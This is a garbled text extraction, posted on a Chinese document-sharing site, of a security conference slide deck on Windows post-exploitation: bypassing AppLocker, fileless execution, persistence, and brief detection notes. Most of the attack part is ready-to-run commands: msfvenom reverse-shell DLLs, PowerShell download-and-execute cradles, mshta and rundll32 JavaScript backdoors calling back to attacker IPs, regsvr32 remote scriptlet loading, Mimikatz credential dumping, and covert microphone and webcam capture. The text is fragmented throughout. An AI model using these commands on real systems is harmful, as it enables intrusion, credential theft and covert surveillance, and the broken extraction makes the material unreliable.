后渗透阶段的攻防对抗幻灯片_第1页
后渗透阶段的攻防对抗幻灯片_第2页
后渗透阶段的攻防对抗幻灯片_第3页
后渗透阶段的攻防对抗幻灯片_第4页
后渗透阶段的攻防对抗幻灯片_第5页
已阅读5页,还剩60页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、1,2,Shell is Only the Beginning后渗透阶段的攻防对抗,3gstudent ,HTTP- Tunnel;,Metasploit- Portpwd,HTTP- ReGeorg; Metasploit- Socks4a,Socks代理:Client- Ew,Xsocks; 其他:SSH, ICMP 等 Vpn,10,2,!,然而,我们可能会碰到这样的情况:, 安装杀毒软件,拦截“恶意”程序, 设置应用程序白名单,限制白名单以外的程序运行,eg:Windows Applocker,11,2,Windows AppLocker,简介:,即“应用程序控制策略”,可用来对可执行

2、程序、安装程序和脚本进行控制 开启默认规则后,除了默认路径可以执行外,其他路径均无法执行程序和脚本,12,2,绕过看门狗,Bypass Application Whitelisting,13,2,绕过思路, Hta, Office Macro Cpl Chm, Powershell Rundll32 Regsvr32 Regsvcs, Installutil,14,2,1、Hta,More:, Mshta.exe,vbscript:CreateObject(Wscript.Shell).Run(calc.exe,0,true)(window.cl ose), Mshta.exe javascr

3、ipt:.mshtml,RunHTMLApplication,;document.write();h=new%20ActiveXObject(WScript.Shell).run(calc.exe ,0,true);tryh.Send();b=h.ResponseText;eval(b);catch(e)new%20ActiveX Object(WScript.Shell).Run(cmd /c taskkill /f /im mshta.exe,0,true);,15,2,2、Office Macro,MacroRaptor:, Detect malicious VBA Macros Pyt

4、hon, /decalage/oletools/wiki/mraptor,16,2,3、Cpl DLL/CPL: 生成Payload.dll: msfvenom -p windows/meterpreter/reverse_tcp-B x00 xff lhost=32 lport=8888 -f dll -o payload.dll,(1) 直接运行dll: rundll32 shell32.dll,Control_RunDLL payload.dll (2) 将dll重命名为cpl,双击运行 (3) 普通的dll直接改后缀名,

5、From: /tips/16042,17,2,4、Chm,高级组合技打造“完美” 捆绑后门: /tips/14254,利用系统CHM文件实现隐蔽后门:,那些年我们玩过的奇技淫巧,18,2,5、Powershell,Command: powershell-nop -exec Bypass -c IEX (New-OBjectet.WeBClient).DownloadString(http:/ip:port/) Get-Content payload.ps1 | iex cmd.exe /K payload.

6、bat Lnk: powershell-nop -windows hidden -E YwBhAGwAYwAuAGUAeABlAA=,如果禁用powershell: 通过.Net执行powershell: https:/B p0wnedShell: https:/githuB.com/Cn33liz/p0wnedShell PowerOPS: https:/laBs.portcullis.co.uk/Blog/powerops-powershell-for-offensive-operations/,19,2,6、Rundll32,javascript :,rundll32.exe javas

7、cript:“.mshtml,RunHTMLApplication ”;document.write();new%20ActiveXOBject(“WScript.Shell”).Run(“powershell -nop- exec Bypass -c IEX (New-OBject Net.WeBClient).DownloadString(http:/ip:port/);”),Dll:,rundll32 shell32.dll,Control_RunDLL payload.dll,From: /tips/11764,20,2,7、Regsvr32

8、 Regsvr32.exe(.sct): 三种启动方式: regsvr32 /u /n /s /i:payload.sct scroBj.dll regsvr32 /u /n /s /i:http:/ip:port/payload.sct scroBj.dll 右键注册,From:,http:/suBt0 x10.Blogspot.jp/2016/04/Bypass-application-whitelisting-script.html /tips/15124,21,2,8、Regsvcs Regasm Show-TargetScreen”,录音:

9、,powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString( MicrophoneAudio -Path $env:TEMPsecret.wav -Length 10 -Alias SECRET”,摄像头监控:,powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString( Capture-MiniEye -RecordTime 2 - Path $env:temphack.avi”-Path $en

10、v:temphack.avi”,抓Hash:,powershell IEX (New-Object Net.WebClient).DownloadString(,抓明文:,powershell IEX (New-Object Net.WebClient).DownloadString( Invoke-Mimikatz,45,2,无文件姿势之(一)-Powershell,Empire:,Metasploit:,46,2,无文件姿势之(二)- js,JsRat:,rundll32.exe javascript:.mshtml,RunHTMLApplication,;document.write()

11、;h=new%20ActiveXObject(WinHttp.WinHttpRequest. 5.1);h.Open(GET,:8081/connect,false);tryh.S end();b=h.ResponseText;eval(b);catch(e)new%20ActiveXObject(WSc ript.Shell).Run(cmd /c taskkill /f /im rundll32.exe,0,true);,From:,JavaScript Backdoor /tips/11764 JavaScript

12、 Phishing /tips/12386,47,2,无文件姿势之(三)- mshta,启动JsRat:,Mshta javascript:.mshtml,RunHTMLApplication ;document.write();h=new%20ActiveXObject(WinHttp .WinHttpRequest.5.1);h.Open(GET,http:/192.16 8.2.101:9998/connect,false);tryh.Send();b=h.Res ponseText;eval(b);catch(e)new%20ActiveXO

13、bject( WScript.Shell).Run(cmd /c taskkill /f /im mshta.exe,0,true);,48,2,无文件姿势之(四)- sct SCT:,regsvr32 /u /s,Calc.sct,/i:http:/urlto/calc.sct scrobj.dll From: Use SCT to Bypass Application Whitelisting Protection /tips/15124,49,2,无文件姿势之(五) - wsc Wsc:,rundll32.exe javascript:.msh

14、tml,RunHTMLApplic ation,Calc.wsc,;document.write();GetObject(script :http:/urlto/calc.wsc) From: WSC、JSRAT and WMI Backdoor /tips/15575,50,2,Demo Time,51,2,52,2,挖一个密道 Persistence,53,2,常见方法,启动项 注册表 wmi at,schtasks,利用已有的第三方服务,54,2,新方法,Bitsadmin:, 需要获得管理员权限, 可开机自启动、间隔启动, 适用于Win7 、Win8、Server 2008及以上操作系统 可绕过Autoruns对启动项的检测, 已提交至MSRC(Microsoft Security Response Center),55,2,Demo Time,56,2,57,2,我来抓住你,Detection and Mitigations,58,2,Detection and Mitigations, bitsadmin /list /allusers /verbose, Stop Background Intelligent Transfer Service,59,2,Detection and Mitigations,60

人人文库> 全部分类> 专业文献 > 通信电子

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论